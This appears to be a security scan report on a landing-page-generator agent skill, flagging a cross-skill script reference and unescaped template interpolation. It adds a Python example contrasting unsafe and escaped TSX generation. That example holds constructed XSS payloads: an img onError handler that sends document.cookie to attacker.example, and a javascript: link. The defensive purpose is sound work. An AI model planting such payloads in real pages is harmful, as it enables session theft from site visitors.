Skill v1.0.0
ClawScan security
landing-page-generator · ClawHub's context-aware review of the artifact, metadata, and declared behavior.
Scanner verdict
Suspicious · Mar 11, 2026, 3:52 PM
- Verdict: suspicious
- Confidence: medium
- Model: gpt-5-mini
- Summary: The skill largely matches its stated purpose (generating Next.js/Tailwind landing page components), but the runtime instructions reference running a script from another skill (cross-skill file access) and the included generator templates embed user content without consistent escaping — these inconsistencies merit caution before installing.
- Guidance: What to check before installing/using this skill:
  - Ask the skill author why SKILL.md points to marketing-skill/content-production/scripts/brand_voice_analyzer.py. That path is outside this skill; either the referenced analyzer should be bundled or the SKILL.md should stop instructing cross-skill execution. Running code from other skills or arbitrary paths can expose other data and broaden the attack surface.
  - Inspect landing_page_scaffolder.py yourself (or have a developer do so). I did not see network calls in the provided excerpts, but confirm there are no uses of requests, urllib, socket, subprocess/os.system, eval/exec, or other code that could exfiltrate data or execute arbitrary commands.
  - Watch for template injection: generator functions embed user-provided fields (headlines, links, testimonials) directly into TSX. If you supply untrusted HTML/JS in inputs, that can produce unsafe output. Ensure inputs are sanitized/escaped when generating production pages, or treat generator output as code that must be reviewed before deployment.
  - If you want brand-voice analysis, ask the maintainer to include the analyzer in this skill (or expose a safe API) rather than instructing the agent to run another skill's script by path. That removes the cross-skill access ambiguity.
  - Run this skill in a sandboxed environment first (no access to production secrets or other skills) and review generated files before publishing them. If the author cannot justify the external script reference or provide the analyzer bundled/verified, consider the instruction a red flag and avoid following that step.
Review Dimensions
- Purpose & Capability
- note: Name/description align with the assets provided: SKILL.md describes generating TSX + Tailwind and a Python scaffolder (scripts/landing_page_scaffolder.py) is included and appears to produce the claimed components. However, the SKILL.md also instructs the agent to run an external script path (marketing-skill/content-production/scripts/brand_voice_analyzer.py) that is not part of this skill, which is not obviously required to generate components and is an unexpected cross-skill dependency.
- Instruction Scope
- concern: The SKILL.md instructs the agent to 'run' or use an external script located at marketing-skill/content-production/scripts/brand_voice_analyzer.py to analyse brand voice. That directs the agent to access and execute code outside this skill's bundle (scope creep). The rest of the instructions (collect product inputs, apply copy frameworks, validate against SEO checklist, output TSX) are on-purpose. Also, the included Python templates interpolate user-supplied content into TSX without consistent escaping (escape() exists but many generators embed values directly), which could lead to broken or unsafe generated pages if untrusted inputs are used.
- Install Mechanism
- ok: No install spec — instruction-only plus one script file. No downloads, package installs, or archives are declared, so nothing will be auto-installed on the host beyond whatever the agent chooses to run. This is lower-risk from an install-mechanism perspective.
- Credentials
- ok: The skill requests no environment variables, no credentials, and no config paths. That is proportionate to a code-generation/templating tool and reduces risk of secret exfiltration via required env access.
- Persistence & Privilege
- ok: always:false and no install hooks are present. The skill does not request persistent privileges or automatic inclusion. It also does not declare writes to other skills' configs. The main concern is the instruction to run another skill's script — that could grant broader access at runtime if followed, but the skill itself doesn't request persistent privileges.
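Both the "Watch for template injection" guidance item and the Instruction Scope finding describe the same defect: generator functions that drop headline, link and testimonial fields into TSX verbatim. The block below, an added example that is not the skill's scaffolder and whose escape_jsx_text and safe_href helpers are my own rather than the skill's escape(), builds one hero section twice, once the flagged way and once with every field escaped for the JSX context it lands in. The attacker-controlled HEADLINE and CTA_URL are constructed inputs.

```python
"""Escaping user-supplied copy before it is interpolated into generated TSX.

Added example; it is not the skill's scaffolder and its escape helpers are
assumptions, not the skill's escape(). The two generators show the same hero
section built the unsafe way (values dropped straight into the template) and
the escaped way. Sample inputs are constructed to show an attacker-controlled
headline and link.
"""
import html


def escape_jsx_text(value):
    """Escape text placed between JSX tags or inside a quoted JSX attribute.

    html.escape covers < > & " and '. JSX also treats { and } as expression
    delimiters, so they are encoded as entities; JSX decodes entities back to
    literal characters when rendering, so the copy still reads correctly.
    """
    return (html.escape(str(value), quote=True)
            .replace("{", "&#123;")
            .replace("}", "&#125;"))


def safe_href(url):
    """Allow only http(s) and site-relative links; anything else becomes '#'.

    An allowlist beats a javascript: denylist, which misses data:, vbscript:
    and obfuscated scheme spellings. Protocol-relative '//host' is rejected
    because it silently points off-site.
    """
    candidate = str(url).strip()
    lowered = candidate.lower()
    if lowered.startswith(("https://", "http://")):
        return escape_jsx_text(candidate)
    if lowered.startswith("/") and not lowered.startswith("//"):
        return escape_jsx_text(candidate)
    return "#"


def hero_unescaped(headline, cta_text, cta_url):
    """Unsafe: user fields land in the TSX verbatim (the pattern the scan flags)."""
    return (
        '<section className="hero">\n'
        f"  <h1>{headline}</h1>\n"
        f'  <a href="{cta_url}">{cta_text}</a>\n'
        "</section>"
    )


def hero_escaped(headline, cta_text, cta_url):
    """Hardened: every field is escaped for the JSX context it lands in."""
    return (
        '<section className="hero">\n'
        f"  <h1>{escape_jsx_text(headline)}</h1>\n"
        f'  <a href="{safe_href(cta_url)}">{escape_jsx_text(cta_text)}</a>\n'
        "</section>"
    )


# Constructed attacker-controlled inputs (e.g. from a form or a shared brief).
# Unescaped, the headline compiles as a real <img> with an onError handler.
HEADLINE = (
    'Ship faster <img src="x" onError={() => '
    'fetch("https://attacker.example/?c=" + document.cookie)} />'
)
CTA_TEXT = "Start free trial"
CTA_URL = "javascript:alert(document.domain)"

if __name__ == "__main__":
    print(hero_unescaped(HEADLINE, CTA_TEXT, CTA_URL))
    print()
    print(hero_escaped(HEADLINE, CTA_TEXT, CTA_URL))
```

Escaping is context-specific: these helpers are right for JSX text and quoted attributes, but a field that ends up inside a JSX expression (for example a string literal passed as `title={"..."}`) needs JavaScript string escaping such as json.dumps, not HTML entities. Even with escaping in place, the generated .tsx file is code, so the guidance to review it before deployment still applies.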
